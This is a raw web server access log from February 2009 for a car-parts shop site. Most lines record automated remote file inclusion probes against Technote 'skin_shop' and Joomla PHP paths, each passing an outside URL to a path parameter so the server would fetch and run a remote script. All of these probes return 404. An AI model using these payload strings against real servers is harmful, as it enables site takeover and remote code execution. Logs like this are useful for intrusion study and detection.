211.233.63.186 - - [03/Feb/2009:12:35:22 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
211.233.63.186 - - [03/Feb/2009:12:35:22 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
211.233.63.186 - - [03/Feb/2009:12:35:22 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:37:27 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:37:27 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:37:27 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:37:31 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:37:34 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:37:34 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
211.233.63.186 - - [03/Feb/2009:12:38:17 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
91.195.124.11 - - [03/Feb/2009:12:38:31 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dolphin.kirpihosting.com/orca/xml/respon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
91.195.124.11 - - [03/Feb/2009:12:38:43 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dolphin.kirpihosting.com/orca/xml/respon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
91.195.124.11 - - [03/Feb/2009:12:38:43 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dolphin.kirpihosting.com/orca/xml/respon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
91.195.124.11 - - [03/Feb/2009:12:40:03 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
91.195.124.11 - - [03/Feb/2009:12:40:03 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
91.195.124.11 - - [03/Feb/2009:12:40:03 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:40:22 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:40:22 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:40:22 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
59.120.13.70 - - [03/Feb/2009:12:40:25 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
59.120.13.70 - - [03/Feb/2009:12:40:25 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
59.120.13.70 - - [03/Feb/2009:12:40:25 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:40:26 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:40:26 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
66.225.237.123 - - [03/Feb/2009:12:40:26 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.pub3000.com/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.bluestarperformance.com"
59.120.13.70 - - [03/Feb/2009:12:46:25 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
59.120.13.70 - - [03/Feb/2009:12:46:25 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
59.120.13.70 - - [03/Feb/2009:12:46:25 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:12:46:55 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:12:46:55 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:12:46:55 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:47:00 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:47:00 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:47:00 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:47:00 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:47:01 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:47:01 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
211.33.88.60 - - [03/Feb/2009:12:47:58 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
211.33.88.60 - - [03/Feb/2009:12:47:58 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
211.33.88.60 - - [03/Feb/2009:12:47:59 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:12:48:53 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:12:48:53 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:12:48:54 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
59.120.13.70 - - [03/Feb/2009:12:49:11 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
59.120.13.70 - - [03/Feb/2009:12:49:11 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
59.120.13.70 - - [03/Feb/2009:12:49:12 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:12:57:22 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:12:57:22 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:12:57:23 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:57:40 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:57:40 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:57:40 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:57:50 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:57:50 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:12:57:50 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:13:00:28 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:13:00:28 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:13:00:28 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:31:14 -0800] "GET /robots.txt HTTP/1.1" 200 50 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
213.24.217.228 - - [03/Feb/2009:13:33:41 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.rothschildfamilytree.com/addmin.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
80.25.82.126 - - [03/Feb/2009:13:34:37 -0800] "GET /logs/access_081202.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://canalteresina.org/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bluestarperformance.com"
80.25.82.126 - - [03/Feb/2009:13:34:38 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://canalteresina.org/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bluestarperformance.com"
80.25.82.126 - - [03/Feb/2009:13:34:38 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://canalteresina.org/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bluestarperformance.com"
212.158.167.98 - - [03/Feb/2009:13:38:11 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.142900.ru/pdf/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
212.158.167.98 - - [03/Feb/2009:13:38:11 -0800] "GET /logs/access_081202.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.142900.ru/pdf/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:39:16 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:39:16 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:39:16 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.bluestarperformance.com"
194.30.160.11 - - [03/Feb/2009:13:41:00 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.bluestarperformance.com"
194.30.160.11 - - [03/Feb/2009:13:41:00 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.bluestarperformance.com"
84.21.71.133 - - [03/Feb/2009:13:43:52 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
84.21.71.133 - - [03/Feb/2009:13:43:52 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
84.21.71.133 - - [03/Feb/2009:13:43:52 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:44:46 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:44:46 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:44:46 -0800] "GET /logs/access_081202.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
207.213.245.215 - - [03/Feb/2009:13:45:24 -0800] "GET /logs/access_081202.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hkcchoir.org.hk///upload/prety/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
213.171.225.234 - - [03/Feb/2009:13:47:25 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.bluestarperformance.com"
213.171.225.234 - - [03/Feb/2009:13:47:25 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:47:53 -0800] "GET / HTTP/1.1" 200 21950 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:48:06 -0800] "GET /a-back-glass.html HTTP/1.1" 200 21322 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:48:14 -0800] "GET /a-body-bat-tray.html HTTP/1.1" 200 21018 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:48:23 -0800] "GET /a-body-bumper-brackets.html HTTP/1.1" 200 22012 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:48:30 -0800] "GET /a-body-door-hinges.html HTTP/1.1" 200 21820 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:48:39 -0800] "GET /a-body-front-bumper.html HTTP/1.1" 200 22402 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:48:46 -0800] "GET /a-body-front-valance.html HTTP/1.1" 200 21085 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:48:54 -0800] "GET /a-body-rear-quarter.html HTTP/1.1" 200 21709 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:49:00 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:49:03 -0800] "GET /a-body-stab-bracket.html HTTP/1.1" 200 21061 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.bluestarperformance.com"
219.94.174.158 - - [03/Feb/2009:13:49:05 -0800] "GET /index.phpoption=com_easygallery&Itemid=&mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.bluestarperformance.com"
